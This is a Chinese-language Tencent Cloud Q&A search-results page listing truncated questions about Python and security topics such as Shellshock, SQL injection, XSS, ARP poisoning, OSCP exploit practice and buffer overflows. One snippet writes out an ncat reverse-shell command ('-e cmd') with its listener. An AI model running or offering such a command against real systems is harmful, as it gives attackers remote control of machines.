根据红帽
httpd (攻击向量) CGI脚本可能受到此问题的影响:当web服务器运行CGI脚本时,它使用环境变量将数据传递给脚本。攻击者可以控制这些环境变量。如果CGI脚本调用Bash,脚本可以作为httpd用户执行任意代码。mod_php、mod_perl和mod_python不使用环境变量,我们认为它们不受影响。mod_php不容易受到CVE-2014-6271和CVE-2014-7169的攻击,因为它不使用环境变量。mod_f
浏览 0提问于2014-09-25得票数 3
回答已采纳
1回答
我想在Python脚本上应用一个算法来检测HTTP洪水攻击。主要思想是将Apache日志解析为MongoDB,但我只想提取那些表示HTTP洪流攻击的行。有什么想法吗?
浏览 0提问于2016-08-20得票数 2
1回答
它的核心是C++,但我使用Python来编写脚本和攻击/状态效果/项等。
我把自己编码到了一个角落里,在那里我必须使用eval来获得我想要的行为。每个攻击由任意数量的组件组成,以实现不同的行为。在这个攻击的例子中,我实现了一个DamageCalculatorComponent,告诉python使用ConstantDamage变体。我在我的脚本文件中实现了所有这些组件。对于我将经常使用的组件类型来说,这一切都很好。在某些攻击中,该<e
浏览 5提问于2012-04-28得票数 1
1回答
我对SQL注入完全陌生,我有一个标准的PCAP分析,它有如下所示的攻击:因此,我使用python脚本分析了PCAP文件,我确信存在SQL注入攻击。我的疑问是,在以下情况下,这种攻击是如何工作的,即,或者
浏览 1提问于2016-05-06得票数 1
回答已采纳
1回答
我有一个未经验证的字段,该字段易受XSS攻击,到目前为止,我已经获得了下面的行,可以成功地调用我的框中的python服务器,该服务器承载了嵌入在html文件中的恶意脚本。也许我对这次攻击的理解是错误的,但我想我应该首先看到对html文件的调用,然后看到恶意JS的调用。 document.locat
浏览 0提问于2018-12-30得票数 0
回答已采纳
1回答
用替罪羊法检测ARP中毒
、、、
在那里,发生了ARP中毒攻击。
有没有一种方法可以使用python脚本中的替罪羊来检测攻击者的IP和MAC入口,以及受害者的IP和MAC入口?
浏览 4提问于2013-11-30得票数 6
回答已采纳
3回答
some_library_code.py我是这样运行example_project.py的:
***\src>: python
浏览 6提问于2021-03-29得票数 1
上下文:作为我的OSCP研究的一部分,运行一个漏洞与易受攻击的VM的。我知道这个VM很容易受到这个漏洞的攻击,因为我在MSF(戊)中运行了这个漏洞,并且它成功了,但是手动执行,我遇到了依赖问题。安装程序:I on kali,最新季度发布
请记住,kali "python“指向python2.7.18,python3指向python3.xany,因为向后兼容(有趣),因为大量的漏洞都是用python2编写的。脚本使用#!/
浏览 9提问于2021-10-17得票数 0
回答已采纳
我使用ncat执行从一台机器到另一台机器的反向"cmd“shell,并且使用以下命令没有任何问题:In the remote machine: ncat <my ip> 443 -e cmdIn my machine: ncat -l 443
浏览 0提问于2014-04-10得票数 2
我已经尽我所能来限制攻击面,但还有一个重要的漏洞。python脚本仅以其编译后的形式(.pyc)存在,并且没有源代码(.py)。我怎样才能阻止别人把自己的脚本转换成可执行文件呢?我是否可以删除python的某些部分,以便它只执行预编译的脚本?
浏览 12提问于2018-08-23得票数 0
1回答
命令语法
、
问题是,如何将其转换为bash脚本?也就是说,一旦我有了MITM位置,什么才是过滤和传递消息的最佳命令/算法?
编辑:似乎对我原来的帖子有误解。我的意思是,我想利用Kali Linux上的卡拉克攻击来黑我自己的android设备。为了更清楚地说明,我正在尝试制作自己的攻击脚本,但我不确定要使用的语法/命令。因此,我想要有关bash脚本的参考资料/书籍,这与复制K齿克攻击有关,也就是说,我需要的是更多的脚本指导,而不是像我读到的原始论文那样的
浏览 0提问于2018-01-29得票数 2
用户将能够提交和执行一些python脚本。我希望确保他们不会从这些脚本访问一些易受攻击的java包/类。另一种选择是完全禁用java intergation。
浏览 2提问于2011-05-05得票数 1
回答已采纳
我想学习Pen测试,并且已经了解Java,并且一直在学习Python,并且对Python语法相当满意。我对Linux和TCP/IP也有一些了解。我的问题是:
我如何学会用Python编写用于钢笔测试的工具,因为我不知道从哪里开始,目前我只使用它来解决Top的实际问题。我可以在Java中学到什么,我可以应用到钢笔测试中?
浏览 0提问于2013-12-28得票数 2
3回答
我有一个web服务,用户可以上传在服务器上运行的python脚本。这些脚本处理服务器上的文件,我希望它们只能看到服务器文件系统的某个层次结构(best:一个临时文件夹,我在这个文件夹上复制我想要处理的文件和脚本)。我想到的是创建一个对FS文件夹具有受限访问权限的用户-最终只能访问包含脚本和文件的文件夹-并使用此用户启动python解释器。
有没有人能给我一个更好的选择?
浏览 2提问于2010-03-16得票数 4
回答已采纳
2回答
如何检测其他机器的模式接口混乱?
、、、、
我有一个项目,就是保护我的盒子免受中段arp毒药的攻击。我应该检测其他机器的接口模式是否混乱。
我必须编写脚本python或命令linux。
浏览 0提问于2015-03-19得票数 -1
2回答
在我使用Python脚本在目标服务器上生成的测试环境中:只需打开/关闭足够数量的ssh连接。这是DOS对sshd的攻击吗?
浏览 0提问于2017-10-16得票数 2
所以我有一个第三方应用程序,它公开了一个Python API。我有一个python脚本,它可以做我需要它做的第三方应用程序。
python脚本只使用命令行参数,没有用户输入,并写入标准输出。由于python的功能如此强大,我想知道从安全的角度来看,创建一个新的可执行文件来启动python进程并将其命令行参数复制到python进程中是否有意义,该文件使用硬编码或本地读取(App.Config)脚本路径。这个新的可执行文件将从.NET应用
浏览 3提问于2012-05-19得票数 0
回答已采纳
1回答
我使用python脚本生成超过C文件中缓冲区大小的输入。我尝试了python myPythonFile.py | .但是,当我在sudo:python myPythonFile.py | sudo ./myCFile中在相同条件下运行C文件时,程序失败(显示seg故障)。
浏览 2提问于2022-12-03得票数 -1
1回答
我正在尝试在橙色数据挖掘中练习对抗性攻击,但在python脚本小部件中加载映像时遇到了一些问题。我已经设置了导入图像小部件连接到python脚本的位置。我对python很陌生,所以非常感谢具体的代码。(谢谢:)
浏览 6提问于2022-05-17得票数 0
云服务器
ICP备案
对象存储
云点播
智聆口语评测
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号